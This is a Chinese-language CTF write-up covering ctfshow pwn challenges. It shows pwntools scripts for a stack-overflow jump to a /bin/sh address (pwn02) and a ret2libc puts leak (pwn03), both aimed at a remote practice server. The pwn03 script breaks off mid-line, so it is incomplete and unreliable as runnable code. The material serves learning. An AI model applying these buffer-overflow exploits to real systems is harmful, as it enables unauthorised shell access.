笔记(pwn篇)"/>
ctfshow刷题笔记(pwn篇)
一入pwn坑深似海,从此逆向是路人
目录
- pwn02
- pwn03
- pwn04
- pwn05(灌水题?)
- pwn06(灌水题+1)
- pwn07
- pwn08(灌水?)
- pwn10
pwn02
常规checksec一下
扔进IDA
点进pwnme()函数看看,明显的栈溢出
搜索字符串有/bin/sh
直接淦它
from pwn import*
io=remote('111.231.70.44',28054)
#io=process('./pwn02')
bin_sh=0x0804850F
payload=b'a'*13+p32(bin_sh)
io.sendline(payload)
io.interactive()
轻松秒杀
pwn03
依旧常规checksec,只开了NX
和上一题几乎一样,只是没给后门,得ret2libc了
需要远程打通,应该是libc版本不同本地打不通
from pwn import*
from LibcSearcher import*
elf=ELF('./pwn03')
#io=process('./pwn03')
io=remote('111.231.70.44',28021)
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.symbols['main']
payload1=b'a'*13+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload1)
io.recvuntil('\n\n')
puts_add=u32(io.recv(4))
print(puts_add)libc=LibcSearcher('puts',puts_add)
libcbase=puts_add-libc.dump(
更多推荐
ctfshow刷题笔记(pwn篇)
发布评论